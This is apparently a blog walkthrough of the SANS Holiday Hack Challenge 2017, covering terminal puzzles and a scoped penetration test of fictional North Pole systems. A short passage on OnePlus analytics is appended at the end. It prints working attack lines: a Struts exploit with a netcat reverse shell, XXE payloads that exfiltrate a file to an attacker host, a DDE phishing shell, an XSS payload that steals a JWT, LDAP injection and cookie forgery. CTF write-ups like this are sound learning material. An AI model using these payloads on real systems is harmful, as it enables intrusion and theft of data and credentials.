Mozilla/5.0 (X11; OpenBSD amd64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/51.0.2704.106 Safari/537.36
Mozilla/5.0 (X11; Linux x86_64; rv:50.0) Gecko/20100101 Firefox/50.0
Mozilla/5.0 (Windows NT 6.3; Trident/7.0; rv:11.0) like Gecko
Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.1 (KHTML, like Gecko) Chrome/21.0.1180.89 Safari/537.1
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/604.3.5 (KHTML, like Gecko)
Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.90 Safari/537.36
Dillo/3.0.5

We try to answer with “Dillo”, and this turns out to be the correct answer

elf@15b12bd7b9ec:~$ ./runtoanswer 
Starting up, please wait......
Enter the name of the least popular browser in the web log: Dillo
That is the least common browser in the web log! Congratulations!

I Don’t Think We’re In Kansas Anymore

Terminal

The terminal in this level gives us the following banner

                       *
                      .~'
                     O'~..
                    ~'O'~..
                   ~'O'~..~'
                  O'~..~'O'~.
                 .~'O'~..~'O'~
                ..~'O'~..~'O'~.
               .~'O'~..~'O'~..~'
              O'~..~'O'~..~'O'~..
             ~'O'~..~'O'~..~'O'~..
            ~'O'~..~'O'~..~'O'~..~'
           O'~..~'O'~..~'O'~..~'O'~.
          .~'O'~..~'O'~..~'O'~..~'O'~
         ..~'O'~..~'O'~..~'O'~..~'O'~.
        .~'O'~..~'O'~..~'O'~..~'O'~..~'
       O'~..~'O'~..~'O'~..~'O'~..~'O'~..
      ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
     ~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
    O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
   .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~
  ..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~.
 .~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'
O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..~'O'~..
Sugarplum Mary is in a tizzy, we hope you can assist.
Christmas songs abound, with many likes in our midst.
The database is populated, ready for you to address.
Identify the song whose popularity is the best.


total 20684
-rw-r--r-- 1 root root 15982592 Nov 29 19:28 christmassongs.db
-rwxr-xr-x 1 root root  5197352 Dec  7 15:10 runtoanswer

We don’t have the file command at our disposal to tell us what type of database christmassongs.db is, but searching for a few obvious candidates for command line clients, we discover that sqlite3 is installed, so this is probably a SQLite database. Using this, we can list the tables, examine the schemas, and craft a query to get us the information we need.

elf@7fad6ef31c2a:~$ sqlite3 christmassongs.db
SQLite version 3.11.0 2016-02-15 17:29:24
Enter ".help" for usage hints.
sqlite> .tables
likes  songs
sqlite> .schema songs
CREATE TABLE songs(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  title TEXT,
  artist TEXT,
  year TEXT,
  notes TEXT
);
sqlite> .schema likes
CREATE TABLE likes(
  id INTEGER PRIMARY KEY AUTOINCREMENT,
  like INTEGER,
  datetime INTEGER,
  songid INTEGER,
  FOREIGN KEY(songid) REFERENCES songs(id)
);
sqlite> SELECT title, songid, COUNT(like) FROM likes JOIN songs ON songid=songs.id GROUP BY songid ORDER BY COUNT(like) DESC LIMIT 1;
Stairway to Heaven|392|11325
sqlite> .quit

And so, the answer is Stairway to Heaven with 11,325 likes.

elf@7fad6ef31c2a:~$ ./runtoanswer 
Starting up, please wait......

Enter the name of the song with the most likes: Stairway to Heaven
That is the #1 Christmas song, congratulations!

Oh Wait! Maybe We Are…

Terminal

The terminal in this level gives us the following banner

              \ /
            -->*<--
              /o\
             /_\_\
            /_/_0_\
           /_o_\_\_\
          /_/_/_/_/o\
         /@\_\_\@\_\_\
        /_/_/O/_/_/_/_\
       /_\_\_\_\_\o\_\_\
      /_/0/_/_/_0_/_/@/_\
     /_\_\_\_\_\_\_\_\_\_\
    /_/o/_/_/@/_/_/o/_/0/_\
   jgs       [___]  


My name is Shinny Upatree, and I've made a big mistake.
I fear it's worse than the time I served everyone bad hake.
I've deleted an important file, which suppressed my server access.
I can offer you a gift, if you can fix my ill-fated redress.

Restore /etc/shadow with the contents of /etc/shadow.bak, then run "inspect_da_box" to complete this challenge.
Hint: What commands can you run with sudo?

Starting with the hint, we examine which commands we can run using sudo

elf@466f6ff38e11:~$ sudo -l
Matching Defaults entries for elf on 466f6ff38e11:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User elf may run the following commands on 466f6ff38e11:
    (elf : shadow) NOPASSWD: /usr/bin/find

We can see that we may use sudo to run /usr/bin/find as the user elf (which we are) and under the group shadow. Moreover, by using find’s exec parameter, we can find the /etc/shadow.bak file and cp it to /etc/shadow like so

elf@466f6ff38e11:~$ sudo -g shadow find /etc/ -name shadow.bak -exec cp {} /etc/shadow \; 2> /dev/null

Then we run inspect_da_box to finish this terminal puzzle

elf@466f6ff38e11:~$ inspect_da_box
                     ___
                    / __'.     .-"""-.
              .-""-| |  '.'.  / .---. \
             / .--. \ \___\ \/ /____| |
            / /    \ `-.-;-(`_)_____.-'._
           ; ;      `.-" "-:_,(o:==..`-. '.         .-"-,
           | |      /       \ /      `\ `. \       / .-. \
           \ \     |         Y    __...\  \ \     / /   \/
     /\     | |    | .--""--.| .-'      \  '.`---' /
     \ \   / /     |`        \'   _...--.;   '---'`
      \ '-' / jgs  /_..---.._ \ .'\\_     `.
       `--'`      .'    (_)  `'/   (_)     /
                  `._       _.'|         .'
                     ```````    '-...--'`
/etc/shadow has been successfully restored!

We’re Off to See the…

Terminal

The terminal in this level gives us the following banner

                 .--._.--.--.__.--.--.__.--.--.__.--.--._.--.
               _(_      _Y_      _Y_      _Y_      _Y_      _)_
              [___]    [___]    [___]    [___]    [___]    [___]
              /:' \    /:' \    /:' \    /:' \    /:' \    /:' \
             |::   |  |::   |  |::   |  |::   |  |::   |  |::   |
             \::.  /  \::.  /  \::.  /  \::.  /  \::.  /  \::.  /
         jgs  \::./    \::./    \::./    \::./    \::./    \::./
               '='      '='      '='      '='      '='      '='

Wunorse Openslae has a special challenge for you.
Run the given binary, make it return 42.
Use the partial source for hints, it is just a clue.
You will need to write your own code, but only a line or two.

total 88
-rwxr-xr-x 1 root root 84824 Dec 16 16:47 isit42
-rw-r--r-- 1 root root   654 Dec 15 19:59 isit42.c.un

The contents of isit42.c.un is as follows

#include <stdio.h>
// DATA CORRUPTION ERROR
// MUCH OF THIS CODE HAS BEEN LOST
// FORTUNATELY, YOU DON'T NEED IT FOR THIS CHALLENGE
// MAKE THE isit42 BINARY RETURN 42
// YOU'LL NEED TO WRITE A SEPERATE C SOURCE TO WIN EVERY TIME
int getrand() {
    srand((unsigned int)time(NULL)); 
    printf("Calling rand() to select a random number.\n");
    // The prototype for rand is: int rand(void);
    return rand() % 4096; // returns a pseudo-random integer between 0 and 4096
}
int main() {
    sleep(3);
    int randnum = getrand();
    if (randnum == 42) {
        printf("Yay!\n");
    } else {
        printf("Boo!\n");
    }
    return randnum;
}

Here, we can write our own implementation of int rand(void) which always returns 42, compile it as a shared library, and use LD_PRELOAD to get the isit42 binary to use it for calls to rand() instead of the implementation provided by the distribution’s libraries. See Ed Skoudis’s excellent blog post for more information.

We place the following implementation of rand() in a file called fakerand.c

int rand(void) {
    return 42;
}

We then compile this code into a shared library and run the provided binary, forcing it to use this library, like so

elf@d5c73ce61adb:~$ gcc fakerand.c -o fakerand -shared -fPIC
elf@d5c73ce61adb:~$ LD_PRELOAD="$PWD/fakerand" ./isit42
Starting up ... done.
Calling rand() to select a random number.
                 .-. 
                .;;\ ||           _______  __   __  _______    _______  __    _  _______  _     _  _______  ______ 
               /::::\|/          |       ||  | |  ||       |  |   _   ||  |  | ||       || | _ | ||       ||    _ |
              /::::'();          |_     _||  |_|  ||    ___|  |  |_|  ||   |_| ||  _____|| || || ||    ___||   | ||
            |\/`\:_/`\/|           |   |  |       ||   |___   |       ||       || |_____ |       ||   |___ |   |_||_ 
        ,__ |0_..().._0| __,       |   |  |       ||    ___|  |       ||  _    ||_____  ||       ||    ___||    __  |
         \,`////""""\\\\`,/        |   |  |   _   ||   |___   |   _   || | |   | _____| ||   _   ||   |___ |   |  | |
         | )//_ o  o _\\( |        |___|  |__| |__||_______|  |__| |__||_|  |__||_______||__| |__||_______||___|  |_|
          \/|(_) () (_)|\/ 
            \   '()'   /            ______    _______  _______  ___      ___      __   __    ___   _______ 
            _:.______.;_           |    _ |  |       ||   _   ||   |    |   |    |  | |  |  |   | |       |
          /| | /`\/`\ | |\         |   | ||  |    ___||  |_|  ||   |    |   |    |  |_|  |  |   | |  _____|
         / | | \_/\_/ | | \        |   |_||_ |   |___ |       ||   |    |   |    |       |  |   | | |_____ 
        /  |o`""""""""`o|  \       |    __  ||    ___||       ||   |___ |   |___ |_     _|  |   | |_____  |
       `.__/     ()     \__.'      |   |  | ||   |___ |   _   ||       ||       |  |   |    |   |  _____| |
       |  | ___      ___ |  |      |___|  |_||_______||__| |__||_______||_______|  |___|    |___| |_______|
       /  \|---|    |---|/  \ 
       |  (|42 | () | DA|)  |       _   ___  _______ 
       \  /;---'    '---;\  /      | | |   ||       |
        `` \ ___ /\ ___ / ``       | |_|   ||____   |
            `|  |  |  |`           |       | ____|  |
      jgs    |  |  |  |            |___    || ______| ___ 
       _._  |\|\/||\/|/|  _._          |   || |_____ |   |
      / .-\ |~~~~||~~~~| /-. \         |___||_______||___|
      | \__.'    ||    '.__/ |
       `---------''---------` 
Congratulations! You've won, and have successfully completed this challenge.

Letters to Santa systems

It’s time to get our hands dirty with some actual penetration testing. We’ve been told that the Letters to Santa system is in scope, as well as everything on the 10.142.0.0/24 network behind it.

Letters to Santa

Visitng the Letters to Santa application, we see what essentially amounts to a HTML form. Looking at the source for this page, we see there are a couple of hidden elements in the page; the first is a form input for the user to enter their US state as part of their letter, (which is of little interest to us), but the second, more interesting tidbit is a link to the development version of the application.

Confirming that dev.northpolechristmastown.com resolves to the same IP address (35.185.84.51) as l2s.northpolechristmastown.com, we consider this to be in-scope. This appears to be quite an early version of the Letters to Santa application. We notice at the foot of the page that the application runs on top of Apache Struts, which was subject to a serious XML deserialisation vulnerability during 2017, CVE-2017-9805 which happens to also be the topic of another excellent blog post from Ed Skoudis on adapting publicly available exploit code to fit your own penetration testing purposes.

Using the sample code publicised by Ed in that blog post, and written by Github user chrisjd20, we are able to exploit this Letters to Santa development application and get a remote shell on the web server. First we set up a netcat listener to catch the connection with nc -l -p 4445 and then use the vulnerability to shunt a shell back to us:

root@kali:~# python cve-2017-9805.py  -u https://dev.northpolechristmastown.com -c "nc <my IP> 4445 -e /bin/bash"

[+] Encoding Command
[+] Building XML object
[+] Placing command in XML object
[+] Converting Back to String
[+] Making Post Request with our payload
[+] Payload executed

This is the answer to the first part of Question 2: Investigate the Letters to Santa application at https://l2s.northpolechristmastown.com. What is the topic of The Great Book page available in the web root of the server?

Exploring the filesystem of the web server, and using the hint in Question 2 about there being a page of the Great Book in the web root, we find /var/www/html/GreatBookPage2.pdf entitled “On the Topic of Flying Animals” (SHA1: aa814d1c25455480942cb4106e6cde84be86fb30).

This is the answer to the second part of Question 2: What is Alabaster Snowball’s password?

Continuing our exploration of the web server, we can inspect the deployed web application in /opt/apache-tomcat/webapps/ROOT/. Grepping recursively for mentions of the string password we find a match in the Java bytecode in WEB-INF/classes/org/demo/rest/example/OrderMySql.class under this path. This contains the connection paramters for the web application’s backing database, and reveals Alabaser Snowball’s password to be stream_unhappy_buy_loss.

Windows SMB Server

It’s time to pivot to some of the systems on the private network behind the Letters to Santa application.

We connect to the Letters to Santa system over SSH using alabaster_snowball’s credentials to give us a more pleasant experience than that which we had with out reverse shell.

Handily, the publicly accessible system which we just compromised has the NMAP network scanner already installed.

We scan the in-scope network range for an SMB server, so specifically looking for hosts with TCP/445 open.

alabaster_snowball@hhc17-apache-struts2:/tmp/asnow.2TbgbuHPStLAsLqGdKJ2BXUF$ nmap -p 445 --open -Pn 10.142.0.0/24

Starting Nmap 7.40 ( https://nmap.org ) at 2018-01-02 19:56 UTC
Nmap scan report for hhc17-smb-server.c.holidayhack2017.internal (10.142.0.7)
Host is up (0.0015s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap scan report for hhc17-emi.c.holidayhack2017.internal (10.142.0.8)
Host is up (0.00026s latency).
PORT    STATE SERVICE
445/tcp open  microsoft-ds

Nmap done: 256 IP addresses (256 hosts up) scanned in 5.85 seconds

Using SSH port forwarding, we forward the open ports on these hosts and explore them again using Alabaster Snowball’s credentials (someone should really have taugh him about credential reuse!).

This is the answer to Question 3: The North Pole engineering team uses a Windows SMB server for sharing documentation and correspondence. Using your access to the Letters to Santa server, identify and enumerate the SMB file-sharing server. What is the file server share name?

On 10.142.0.7 there is a share named FileStor containing five documents

root@kali:~# /usr/share/doc/python-impacket/examples/smbclient.py alabaster_snowball@localhost
Impacket v0.9.15 - Copyright 2002-2016 Core Security Technologies

Password:
Type help for list of commands
# shares
ADMIN$
C$
FileStor
IPC$
# use FileStor
# ls
drw-rw-rw-          0  Tue Jan  2 04:27:27 2018 .
drw-rw-rw-          0  Tue Jan  2 04:27:27 2018 ..
-rw-rw-rw-     255520  Wed Dec  6 21:47:46 2017 BOLO - Munchkin Mole Report.docx
-rw-rw-rw-    1275756  Mon Dec  4 20:04:34 2017 GreatBookPage3.pdf
-rw-rw-rw-     133295  Wed Dec  6 21:47:47 2017 MEMO - Password Policy Reminder.docx
-rw-rw-rw-      10245  Wed Dec  6 22:28:21 2017 Naughty and Nice List.csv
-rw-rw-rw-      60344  Wed Dec  6 21:51:47 2017 Naughty and Nice List.docx

So, we can retrieve page 3 of the Great Book, entitled “The Great Schism” (SHA1: 57737da397cbfda84e88b573cd96d45fcf34a5da).

I was unable to access the SMB service listening on 10.142.0.8 either as a guest or with Alabaster Snowball’s credentials.

Elf Web Access

Our next target is the Elf Web Access (EWA) mail server which we are told lives on the internal network at http://mail.northpolechristmastown.com/ so forward another port over SSH (using the hostname works just fine, but for the sake of completeness this server lives at 10.142.0.5).

Navigating to the EWA web interface, we are greeted with a login screen. A first good guess of alabaster_snowball@northpolechristmastown.com as a username, and the usual password yields a very helpful error message, which informs us that the user does not exist and furthermore discloses that valid email addresses for this system are of the form first.last@northpolechristmastown.com.

Adapting our next attempt with this information still does not get us into Alabaster’s mailbox, however. Time to look for a weak spot in the authentication mechanism.

Looking at the cookies which our browser has after attempting to log into the webmail application, we see that there is a cookie set with the name EWA and value {"name":"GUEST","plaintext":"","ciphertext":""}. Referring to the first few hints from Pepper Minstix, they suggest that we may find some source code snippets on the web server, and that Alabaster was trying to hide from search engines, and that the crypto was implemented by him (which almost certainly means it is broken in some manner).

The search engine hint suggests that we might find something interesting in the robots.txt file, and surely enough we find that Alabaster has attempt to exclude the file cookie.txt from indexing by search engines.

Fetching the contents of this file, we find the following snippet of javascript code which, as the comment at the top suggests, Alabaster found online and adapted for use in EWA (differing functionally only in the cookie name, as far as we can tell).

//FOUND THESE FOR creating and validating cookies. Going to use this in node js
    function cookie_maker(username, callback){
        var key = 'need to put any length key in here';
        //randomly generates a string of 5 characters
        var plaintext = rando_string(5)
        //makes the string into cipher text .... in base64. When decoded this 21 bytes in total length. 16 bytes for IV and 5 byte of random characters
        //Removes equals from output so as not to mess up cookie. decrypt function can account for this without erroring out.
        var ciphertext = aes256.encrypt(key, plaintext).replace(/\=/g,'');
        //Setting the values of the cookie.
        var acookie = ['IOTECHWEBMAIL',JSON.stringify({"name":username, "plaintext":plaintext,  "ciphertext":ciphertext}), { maxAge: 86400000, httpOnly: true, encode: String }]
        return callback(acookie);
    };
    function cookie_checker(req, callback){
        try{
            var key = 'need to put any length key in here';
            //Retrieving the cookie from the request headers and parsing it as JSON
            var thecookie = JSON.parse(req.cookies.IOTECHWEBMAIL);
            //Retrieving the cipher text 
            var ciphertext = thecookie.ciphertext;
            //Retrievingin the username
            var username = thecookie.name
            //retrieving the plaintext
            var plaintext = aes256.decrypt(key, ciphertext);
            //If the plaintext and ciphertext are the same, then it means the data was encrypted with the same key
            if (plaintext === thecookie.plaintext) {
                return callback(true, username);
            } else {
                return callback(false, '');
            }
        } catch (e) {
            console.log(e);
            return callback(false, '');
        }
    };

Examining this implementation, we can see that there is a bug whereby we can supply a ciphertext equal in length to the Initialisation Vector (IV) of the cipher, which in the case of AES-256 is 128 bits (or 16 bytes) and the equality check will evaluated to true for a zero-length plaintext value.

Hence, all way have to do is modify our cookie, setting the username to the email account we wish to access the inbox for, leave the plaintext value as empty, and set the ciphertext value to 16 arbitrary bytes, base64 encoded. For example, setting our cookie to {"name":"alabaster.snowball@northpolechristmastown.com","plaintext":"","ciphertext":"AAAAAAAAAAAAAAAAAAAAAA=="} and refreshing the login page, we are greeted with Alabaster’s inbox.

Let this be a lesson; always understand code you find online if you intend to use or adapt it in your own application!

This is the answer to Question 4: Elf Web Access (EWA) is the preferred mailer for North Pole elves, available internally at http://mail.northpolechristmastown.com. What can you learn from The Great Book page found in an e-mail on that server?

Snooping through Alabaster’s inbox we find an email from Holly Evergreen with the subject “Lost book page”. Inside is a link to page 4 of the Great Book entitled “The Rise of the Lollipop Guild” (SHA1: f192a884f68af24ae55d9d9ad4adf8d3a3995258). This page tells us of the tension between the Elves and the Munchkins leading up to the Great Schism, the offensive activities of a group of Munchkins calling themselves the Lollipop guild against the North Pole computer and network infrastructure, and even suggests that the Elves have been infiltrated by Lollipop Guild operatives.

Naughty and Nice

This is the answer to first part of Question 5: How many infractions are required to be marked as naughty on Santa’s Naughty and Nice list?

Our first data source is a CSV file from the SMB share we discovered earlier, Naughty and Nice List.csv which contains a list of names in the first column, and whether they are considered Naughty or Nice.

Our second data source comes from the North Pole Police Department website, which is publicly accessible at https://nppd.northpolechristmastown.com/. Here, we find an interface for querying infractions. Once a query has been specified, a download link is made available which appends the query parameter json with value 1 to the query string. By conducting a query that will return all infractions, such as title:* we can download all the infractions in JSON format for easy parsing.

The JSON data is not yet structured in a format which makes it easy to combine with the Naughty and Nice List in order to work out how many infractions are required for someone to be considered Naughty, so we use the jq tool to group infractions by the name of the person, aggregating into a count, and exporting as a CSV

user@machine:~$ jq -r '.infractions | group_by(.name) | .[] | [ .[0].name, (. | length) ] | @csv' infractions.json > infractions_count.csv

Performing a left join of this output with the Naughty and Nice List, we discover that to be considered naughty, one must have four or more infractions.

Aside from the two insider threat moles Boq Questrian and Bini Aru mentioned in the BOLO Word document from the SMB share, I have yet to figure out how to answer the second part of Question 5: What are the names of at least six insider threat moles?

North Pole and Beyond

This is the answer to the third part of Question 5: Who is throwing the snowballs from the top of the North Pole Mountain and what is your proof?

Back in the North Pole in Beyond, in an NPC conversation with Bumble and Sam, we discover that is is the Abominable Snow Monster who has been throwing the snowballs from the top of the North Pole Mountain. However, all may not be as it seems; according to Sam the Snowman, the Abominable Snow Monster doesn’t appear to be acting as himself, and he seems to be under someone else’s control. The plot thickens…

Elf as a Service

This is the answer to Question 6: The North Pole engineering team has introduced an Elf as a Service (EaaS) platform to optimize resource allocation for mission-critical Christmas engineering projects at http://eaas.northpolechristmastown.com. Visit the system and retrieve instructions for accessing The Great Book page from C:\greatbook.txt. Then retrieve The Great Book PDF file by following those directions. What is the title of The Great Book page?

The Elf as a Service (EaaS) platform is a web application which allows users to upload an XML file defining orders that elves have placed to fulfil Christmas wishes. By following the guidance in an excellent blog post on the SANS Penetration Testing blog, entitled Exploiting XXE Vulnerabilities in IIS/.NET we learn that by hosting malicious XML Document Type Definition (DTD) file on a web server accessible by this application, and uploading an equally malicious XML document using the application’s built-in functionality for placing orders, we can read arbitrary files on the remote filesystem. We are told that instructions for acquiring another page of the Great Book are located in C:\greatbook.txt on the server.

So, we host the following DTD file on a webserver of our chosing

<?xml version="1.0" encoding="UTF-8"?>
<!ENTITY % stolendata SYSTEM "file:///c:/greatbook.txt">
<!ENTITY % inception "<!ENTITY &#x25; sendit SYSTEM 'http://MY_IP_ADDRESS:4446/?%stolendata;'>">

and upload the following XML document

<?xml version="1.0" encoding="utf-8"?>
<!DOCTYPE demo [
     <!ELEMENT demo ANY >
     <!ENTITY % extentity SYSTEM "http://MY_IP_ADDRESS:4445/evil.dtd">
     %extentity;
     %inception;
     %sendit;
      ]
>

with a netcat listener sitting on port 4446, and we receive the following HTTP request

GET /?http://eaas.northpolechristmastown.com/xMk7H1NypzAqYoKw/greatbook6.pdf HTTP/1.1
Host: MY_IP_ADDRESS:4446
Connection: Keep-Alive

Using this information, we navigate to the specified path in our browser and receive page 6 of the Great Book entitled “The Dreaded Inter-Dimensional Tornadoes” (SHA1: 8943e0524e1bf0ea8c7968e85b2444323cb237af)

Elf Web Access - phishing attack

Going back to EWA and reading through more of the exchanges there, it seems that Alabaster Snowball is desperate for some of Mrs. Claus’s gingerbread cookies. So desperate, in fact, that he claims that he would be willing to download any Microsoft Word docx file that he is sent (in an email on the mail.northpolechristmastown.com system containing the phrase “gingerbread cookie recipe”), open it, and click through any prompts that appear. In another email, he also reveals that he is on a workstation with Powershell installed, and netcat in his path. I feel a phishing attack brewing.

To this end, we send him a Word document with a Dynamic Data Exchange (DDE) exploit in it (which, in an email exchange, Minty Candycane later warns him about) containing the following DDEAUTO field DDEAUTO c:\\windows\\system32\\cmd.exe "/k nc.exe MY_IP_ADDRESS 4445 -e cmd.exe" which, combined with a netcat listener, gives us a shell on his machine.

Using this, we can exfiltrate page 7 of the Great Book, entitled “Regarding the Witches of Oz” (SHA1: c1df4dbc96a58b48a9f235a1ca89352f865af8b8)

Elf Database

Next, we are asked to penetrate the Elf Database, at http://edb.northpolechristmastown.com on the internal network behind the Letters to Santa system. Navigating to this URL, we find another web application protected behind a login page. After trying the obvious combinations derived from credentials we have already discovered on related system, we turn out attention to a support link on the login page from users who have forgotten their username and password.

We are presented with a form that asks for our username, email address, and a message to the support staff. Rudimentary attempts at performing a cross-site scripting (XSS) attack against the message field under the username alabaster_snowball are met with first of all with a helpful validation failure informing us that the format of our username is incorrect and should be of the form first.last . How helpful!

Attempting again as alabaster.snowball gives us the rather interesting pop-up message containing “Alert, Hacker!”, but as it turns out this is just client-side validation which can be bypassed by posting directly to the right endpoint… Almost.

Unfortunately, sending the XSS payload directly to the server shows that there is also some server-side string replacement in place too, for example the string <script> gets replaced with <>. Consulting with the OWASP cheat sheet for XSS mitagation bypasses, we try a different tact, by sending an img tag with its onerror attribute set to some Javascript that will execute.

We abuse this to seal the authentication JWT of the user visting the support page (kept in their browser’s local storage, from inspecting the web application’s source code) by making the following request

curl "http://edb.northpolechristmastown.com:4003/service" -H "Host: edb.northpolechristmastown.com:4003" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" -H "Accept: */*" -H "Accept-Language: en-GB,en;q=0.5" --compressed -H "Referer: http://edb.northpolechristmastown.com:4003/index.html" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "X-Requested-With: XMLHttpRequest" -H "Cookie: SESSION=xH8h46s9134Evn5Hgr4Z" -H "Connection: keep-alive" -H "Pragma: no-cache" -H "Cache-Control: no-cache" --data 'uid=alabaster.snowball' --data-urlencode 'email=alabaster.snowball@northpolechristmastown.com'  --resolve edb.northpolechristmastown.com:4003:127.0.0.1 --data-urlencode "message=<img src=x onerror=this.src='http://MY_IP_ADDRESS:4446/?token='+localStorage.getItem('np-auth')>" 

which results in us receiving the following request

GET /?token=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I HTTP/1.1
Referer: http://127.0.0.1/reset_request?ticket=UP4XU-R52T0-I50UF-K868U
User-Agent: Mozilla/5.0 (Unknown; Linux x86_64) AppleWebKit/538.1 (KHTML, like Gecko) PhantomJS/2.1.1 Safari/538.1
Accept: */*
Connection: Keep-Alive
Accept-Encoding: gzip, deflate
Accept-Language: en-US,*
Host: MY_IP_ADDRESS:4446

We can now taking the JWT and attempt to recover the secret used to calculate the HMAC-SHA265 signature (after trying the obvious of seeing if their implementation of JWT validation is succeptible of providing the none hashing algorithm, which it isn’t). After trying and failing to get John the Ripper to do the hard work for us (apparently it’s broken on the rolling Kali distribution for this task, after formatting the JWT in a John-friendly format), we resort to a JWT cracker on Github which does a naive bruteforce over a given character set up to a maximum length for the keyspace.

After a few tens of minutes, the compiled jwtcrack binary turns up the secret of 3lv3s. Using this, we can modifiy this JWT and extend its expiry date into the future.

./jwtcrack eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE3LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.M7Z4I3CtrWt4SGwfg7mi6V9_4raZE5ehVkI9h04kr6I

Secret is "3lv3s"

Inserting this into our local storage and refreshing the page logs us into the Elf Database as alabaster.snowball.

Unfortunately, users of the Elf Database are only allowed to query it for information on elves or reindeer (see the LDAP LDIF template below, located at http://edb.northpolechristmastown.com/dev/LDIF_template.txt which was found via the site’s robots.txt.

dn: dc=com
dc: com
objectClass: dcObject

dn: dc=northpolechristmastown,dc=com
dc: northpolechristmastown
objectClass: dcObject
objectClass: organization

dn: ou=human,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: human

dn: ou=elf,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: elf

dn: ou=reindeer,dc=northpolechristmastown,dc=com
objectClass: organizationalUnit
ou: reindeer

dn: cn= ,ou= ,dc=northpolechristmastown,dc=com
objectClass: addressbookPerson
cn: 
sn: 
gn: 
profilePath: /path/to/users/profile/image
uid: 
ou: 
department: 
mail: 
telephoneNumber: 
street:
postOfficeBox: 
postalCode: 
postalAddress: 
st: 
l: 
c: 
facsimileTelephoneNumber: 
description: 
userPassword: 

Noticing that some of the parameters from this form may be being inserted directly into an LDAP query, and combining this information with the very helpful blog post Understanding and Exploiting Web-based LDAP we can craft the following request that allows us to fetch every object in dc=northpolechristmastown,dc=com and also request the userPassword property

curl "http://edb.northpolechristmastown.com:4003/search" -H "Host: edb.northpolechristmastown.com:4003" -H "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:57.0) Gecko/20100101 Firefox/57.0" -H "Accept: */*" -H "Accept-Language: en-GB,en;q=0.5" --compressed -H "Referer: http://edb.northpolechristmastown.com:4003/home.html" -H "Content-Type: application/x-www-form-urlencoded; charset=UTF-8" -H "np-auth: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJkZXB0IjoiRW5naW5lZXJpbmciLCJvdSI6ImVsZiIsImV4cGlyZXMiOiIyMDE4LTA4LTE2IDEyOjAwOjQ3LjI0ODA5MyswMDowMCIsInVpZCI6ImFsYWJhc3Rlci5zbm93YmFsbCJ9.gr2b8plsmw_JCKbomOUR-E7jLiSMeQ-evyYjcxCPXco" -H "X-Requested-With: XMLHttpRequest" -H "Cookie: SESSION=A4y98fFdt6n3v51cmet8" -H "Connection: keep-alive" --data "name=))(department=*)(|(cn=&isElf=True&attributes=profilePath"%"2Cgn"%"2Csn"%"2Cmail"%"2Cuid"%"2Cdepartment"%"2CtelephoneNumber"%"2Cdescription"

which reveals to us that Santa Claus’s userPassword property is d8b4c05a35b0513f302a85c409b4aab3. A quick Google search tells us that this is the MD5 hash of the string 001cookielips001.

This is the answer to Question 8: Fetch the letter to Santa from the North Pole Elf Database at http://edb.northpolechristmastown.com. Who wrote the letter?

Using this, we can log into the Elf Database as Santa Claus himself access the Santa Panel, revealing a message containing the following picture of a letter written by The Wizard of Oz himself

Back to the North Pole and Beyond

This is the answer to Question 9: Which character is ultimately the villain causing the giant snowball problem. What was the villain’s motive?

Completing the game puzzles, we engage in another NPC conversation where we find out who is truly behind this Christmas misery, Glinda the Good Witch. She confesses that she is responsible for casting a magic spell on the Abominable Snow Monster, in an attempt to make money from the Elf-Munchkin conflict.

It’s me, Glinda the Good Witch of Oz! You found me and ruined my genius plan!

You see, I cast a magic spell on the Abominable Snow Monster to make him throw all the snowballs at the North Pole. Why? Because I knew a giant snowball fight would stir up hostilities between the Elves and the Munchkins, resulting in all-out WAR between Oz and the North Pole. I was going to sell my magic and spells to both sides. War profiteering would mean GREAT business for me.

But, alas, you and your sleuthing foiled my venture. And I would have gotten away with it too, if it weren’t for you meddling kids!

OnePlus OxygenOS built-in analytics

Tue, 06 Jun 2017 00:00:00 +0000

Update 2017-10-10

After gaining some traction online, Twitter user @JaCzekanski pointed out that there is a way to remove the OnePlus Device Manager app via adb, without requiring root (substitute net.oneplus.odm for pkg)

@chrisdcmoore I've read your article about OnePlus Analytics. Actually, you can disable it permanently: pm uninstall -k --user 0 pkg
— Jakub Czekański (@JaCzekanski) October 10, 2017

Whilst completing the SANS Holiday Hack Challenge 2016, I had cause to proxy the internet traffic from my phone, a OnePlus 2, through OWASP ZAP, a security tool for attacking web applications.

Amidst the traffic, I noticed requests to a domain which I’d not seen before, open.oneplus.net, and decided to examine them a little closer.

